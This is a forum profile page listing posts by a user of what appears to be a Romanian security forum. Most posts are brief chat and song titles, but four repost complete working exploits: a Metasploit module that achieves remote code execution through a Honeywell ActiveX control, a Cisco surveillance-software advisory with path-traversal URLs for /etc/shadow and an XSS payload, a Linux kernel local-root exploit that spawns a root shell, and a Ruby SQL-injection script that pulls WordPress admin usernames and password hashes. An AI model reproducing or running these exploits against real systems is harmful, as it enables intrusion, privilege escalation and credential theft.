Jump to content

Gonzalez

Active Members
  • Posts

    1577
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by Gonzalez

  1. Bine ca sunt infectate PC-urile americanilor, unde is multi bani. -Gonzalez
  2. Metallica - Die Die My Darling.mp3 -Gonzalez
  3. Ontopic: Am vazut cat de supermani sunteti. Dar voi nici macar atat nu ati facut cat au facut cei doi, si mai vorbiti de iceman ca nu are dinti un gura si ca a aparut pe TV. Voi daca ati fi urati cu cosuri si asa mai departe tot ati fi acceptat invitatia celor de la Pro TV sa fiti pe sticla. Asa ca nu mai comentati fara rost. -Gonzalez
  4. Ce urat e jocul ala ^ -Gonzalez
  5. Ice Cube - It Was A Good Day (HD) -Gonzalez
  6. Parazitii - Super Sclavi.mp3 -Gonzalez
  7. Foarte bun postul. -Gonzalez
  8. Bun venit pe RST. -Gonzalez
  9. Bun venit pe RST. -Gonzalez
  10. Torsten Kanzler - Rock und Roll -Gonzalez
  11. Bun venit pe RST. -Gonzalez
  12. Chris Liebing & Speedy J (Collabs) @ Lehmann Club,Germany (21.04.2012) -Gonzalez
  13. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Honeywell HSC Remote Deployer ActiveX Remote Code Execution", 'Description' => %q{ This modules exploits a vulnerability found in the Honewell HSC Remote Deployer ActiveX. This control can be abused by using the LaunchInstaller() function to execute an arbitrary HTA from a remote location. This module has been tested successfully with the HSC Remote Deployer ActiveX installed with HoneyWell EBI R410.1. }, 'License' => MSF_LICENSE, 'Author' => [ 'juan vazquez' ], 'References' => [ [ 'CVE', '2013-0108' ], [ 'OSVDB', '90583' ], [ 'BID', '58134' ], [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi' ], [ 'URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf' ] ], 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f -k' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Feb 22 2013", 'DefaultTarget' => 0)) end def exploit @var_exename = rand_text_alpha(5 + rand(5)) + ".exe" @dropped_files = [ @var_exename ] super end def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") end @dropped_files.delete_if do |file| win_file = file.gsub("/", "\\\\") if session.type == "meterpreter" begin wintemp = session.fs.file.expand_path("%TEMP%") win_file = "#{wintemp}\\#{win_file}" session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) print_good("Deleted #{file}") true rescue ::Rex::Post::Meterpreter::RequestError print_error("Failed to delete #{win_file}") false end end end end def build_hta(cli) var_shellobj = rand_text_alpha(rand(5)+5); var_fsobj = rand_text_alpha(rand(5)+5); var_fsobj_file = rand_text_alpha(rand(5)+5); var_vbsname = rand_text_alpha(rand(5)+5); var_writedir = rand_text_alpha(rand(5)+5); var_origLoc = rand_text_alpha(rand(5)+5); var_byteArray = rand_text_alpha(rand(5)+5); var_writestream = rand_text_alpha(rand(5)+5); var_strmConv = rand_text_alpha(rand(5)+5); p = regenerate_payload(cli); exe = generate_payload_exe({ :code => p.encoded }) # Doing in this way to bypass the ADODB.Stream restrictions on JS, # even when executing it as an "HTA" application # The encoding code has been stolen from ie_unsafe_scripting.rb print_status("Encoding payload into vbs/javascript/hta..."); # Build the content that will end up in the .vbs file vbs_content = Rex::Text.to_hex(%Q| Dim #{var_origLoc}, s, #{var_byteArray} #{var_origLoc} = SetLocale(1033) |) # Drop the exe payload into an ansi string (ansi ensured via SetLocale above) # for conversion with ADODB.Stream vbs_ary = [] # The output of this loop needs to be as small as possible since it # gets repeated for every byte of the executable, ballooning it by a # factor of about 80k (the current size of the exe template). In its # current form, it's down to about 4MB on the wire exe.each_byte do |b| vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % })\n") end vbs_content << vbs_ary.join("") # Continue with the rest of the vbs file; # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent # Then use ADODB.Stream again to write the binary to file. #print_status("Finishing vbs..."); vbs_content << Rex::Text.to_hex(%Q| Dim #{var_strmConv}, #{var_writedir}, #{var_writestream} #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}" Set #{var_strmConv} = CreateObject("ADODB.Stream") #{var_strmConv}.Type = 2 #{var_strmConv}.Charset = "x-ansi" #{var_strmConv}.Open #{var_strmConv}.WriteText s, 0 #{var_strmConv}.Position = 0 #{var_strmConv}.Type = 1 #{var_strmConv}.SaveToFile #{var_writedir}, 2 SetLocale(#{var_origLoc})|) hta = <<-EOS <script> var #{var_shellobj} = new ActiveXObject("WScript.Shell"); var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject"); var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%"); var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true); #{var_fsobj_file}.Write(unescape("#{vbs_content}")); #{var_fsobj_file}.Close(); #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true); #{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false); #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs"); window.close(); </script> EOS return hta end def on_request_uri(cli, request) agent = request.headers['User-Agent'] if agent !~ /MSIE \d/ print_error("Browser not supported: #{agent.to_s}") send_not_found(cli) return end uri = ((datastore['SSL']) ? "https://" : "http://") uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']) uri << ":#{datastore['SRVPORT']}" print_status("Request received for #{request.uri}"); if request.uri =~ /\/SystemDisplays\/RemoteInstallWelcome.hta/ hta = build_hta(cli) print_status("Sending HTA application") send_response(cli, hta, {'Content-Type'=>'application/hta'}) return end html = <<-EOS <html> <body> <object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867"> </object> <script> RemoteInstaller.LaunchInstaller("#{uri}", "", false); </script> </body> </html> EOS # we need to handle direct /SystemDisplays/RemoteInstallWelcome.hta requests proc = Proc.new do |cli, req| on_request_uri(cli, req) end add_resource({'Path' => "/SystemDisplays/RemoteInstallWelcome.hta", 'Proc' => proc}) rescue nil print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end end
  14. # Exploit Title:Cisco Video Surveillance Operations Manager Multiple vulnerabilities # Google Dork: intitle:"Video Surveillance Operations Manager > Login" # Date: 22 Feb 2013 reported to the vendor # Exploit Author: Bassem | bassem.co # Vendor Homepage: www.cisco.com # Version: Version 6.3.2 # Tested on: Version 6.3.2 #1- The application is vulnerable to Local file inclusion read_log.jsp and read_log.dep not validate the name and location of the log file , un authenticated remote attacker can perform this --------------------------------------------- read_log.jsp: /usr/BWhttpd/root/htdocs/BWT/utils/logs from /usr/BWhttpd/logs/<%= logName %> --------------------------------------------- --------------------------------------------- read_log.dep <%! protected LinkedList getBwhttpdLog( String logName, String theOrder ) { String logPath = "/usr/BWhttpd/logs/"; String theLog = logPath + logName; LinkedList resultList = new LinkedList(); try { BufferedReader in = new BufferedReader(new FileReader(theLog)); String theLine = ""; while( (theLine = in.readLine()) != null ) { if( theOrder.indexOf("descending") > -1 ) { resultList.addFirst(theLine); } else { resultList.addLast(theLine); } } ----------------------------------------------- POC: http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow ##################################################################### #2- The application is vulnerable to local file inclusion select and display log not validate the log file names , If attacker pass /etc/passwd through the http post request system will display it as log file POC: http://serverip/monitor/logselect.php ##################################################################### #3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't perform the proper authentication for the management and view console, Remote attacker can gain access to the system and view the attached cameras without authentication POC: http://serverip/broadware.jsp ##################################################################### #4 Application is vulnerable to XSS The web application doesn't perform validation for the inputs/outputs for many of its pages so its vulnerable to XSS attacks POC: http://serverip/vsom/index.php/ "/title><script>alert("ciscoxss");</script> -- Best Regards Bassem
  15. Local root exploit for Fedora 18 x86_64 using nl_table to leverage the sock_diag_handlers[] vulnerability. /* * CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 * This exploit uses nl_table to jump to a known location */ #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) kernel_code() { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy, sym[512]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (!f) { return 0; } while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); if (ret == 0) { fscanf(f, "%s\n", sym); continue; } if (!strcmp(name, sym)) { printf("[+] resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char*argv[]) { int fd; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; commit_creds = (_commit_creds) get_symbol("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); sock_diag_handlers = get_symbol("sock_diag_handlers"); nl_table = get_symbol("nl_table"); if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){ printf("some symbols are not available!\n"); exit(1); } family = (nl_table - sock_diag_handlers) / 8; printf("family=%d\n",family); req.r.sdiag_family = family; if(family>255){ printf("nl_table is too far!\n"); exit(1); } unsigned long mmap_start, mmap_size; mmap_start = 0x100000000; mmap_size = 0x200000; printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } memset((void*)mmap_start, 0x90, mmap_size); char jump[] = "\x55" // push %ebp "\x48\x89\xe5" // mov %rsp, %rbp "\x48\xc7\xc0\x00\x00\x00\x00" // movabs 0x00, %rax "\xff\xd0" // call *%rax "\x5d" // pop %rbp "\xc3"; // ret unsigned int *asd = (unsigned int*) &jump[7]; *asd = (unsigned int)kernel_code; printf("&kernel_code = %x\n", (unsigned int) kernel_code); memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); if ( send(fd, &req, sizeof(req), 0) < 0) { printf("bad send\n"); close(fd); return -1; } printf("uid=%d, euid=%d\n",getuid(), geteuid() ); if(!getuid()) system("/bin/sh"); }
  16. CHRIS LIEBING Live @ CLR London Warehouse Party 24-11-2012 -Gonzalez
  17. Vin adevaratii hackeri la TV. Iceman nici nu stie sa vorbeasca romaneste. -Gonzalez
  18. Metallica - Leper Messiah.mp3 -Gonzalez
  19. Bun venit pe RST. -Gonzalez
  20. Iron Maiden - Out of The Shadows -Gonzalez
  21. http://reviews.cnet.com/2300-6452_7-10016134.html LE: damn, seamana prea tare cu S3 -Gonzalez
  22. #!/usr/bin/ruby # # Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection # Google Dork: inurl:"/wp-content/plugins/leaguemanager/" # Date: 13/03/13 # Exploit Author: Joshua Reynolds # Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/ (No longer active) # Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip (No longer active) # Version: 3.8 # Tested on: BT5R1 - Ubuntu 10.04.2 LTS # CVE: CVE-2013-1852 #----------------------------------------------------------------------------------------- #Description: # #An SQL Injection vulnerability exists in the league_id parameter of a function call made #by the leaguemanager_export page. This request is processed within the leaguemanager.php: # #if ( isset($_POST['leaguemanager_export'])) # $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']); # #Which does not sanitize of SQL injection, and is passed to the admin/admin.php page #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection #when making this call: $this->league = $leaguemanager->getLeague($league_id); #The information is then echoed to a CSV file that is then provided. # #Since no authentication is required when making a POST request to this page, #i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established #session. # #Fix: # #A possible fix for this would be to cast the league_id to an integer during any #of the function calls. The following changes can be made in the leaguemanager.php file: #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']); # #These functions should also not be available to public requests, and thus session handling #should also be checked prior to the requests being processed within the admin section. # #The responsible disclosure processes were distorted by the fact that the author no longer #supports his well established plugin, and there are currently no maintainers. After #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin #and not patch the vulnerability. # #The following ruby exploit will retrieve the administrator username and the salted #password hash from a given site with the plugin installed: #------------------------------------------------------------------------------------------ #Exploit: require 'net/http' require 'uri' if ARGV.length == 2 post_params = { 'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\ '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--', 'mode' => 'teams', 'leaguemanager_export' => 'Download+File' } target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export" begin resp = Net::HTTP.post_form(URI.parse(target_url), post_params) rescue puts "Invalid URL..." end if resp.nil? print_error "No response received..." elsif resp.code != "200" puts "Page doesn't exist!" else admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/) if(admin_login.length > 0) puts "Username: #{admin_login[0][0]}" puts "Hash: #{admin_login[0][1]}" puts "\nNow go crack that with Hashcat :)" else puts "Username and hash not received. Maybe it's patched?" end end else puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\"" end #Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family. # #Contact: #Mail: infosec4breakfast@gmail.com #Blog: infosec4breakfast.com #Twitter: @jershmagersh #Youtube: youtube.com/user/infosec4breakfast
  23. Mie nu-mi place, acum vad poza. Nu ma impresioneaza cu nimic. -Gonzalez
  24. Folosesc facebook pentru site-uri, si nu am vazut inca noul look. Mersi pt informatie, stiam ca vor schimba designul... -Gonzalez
×
×
  • Create New...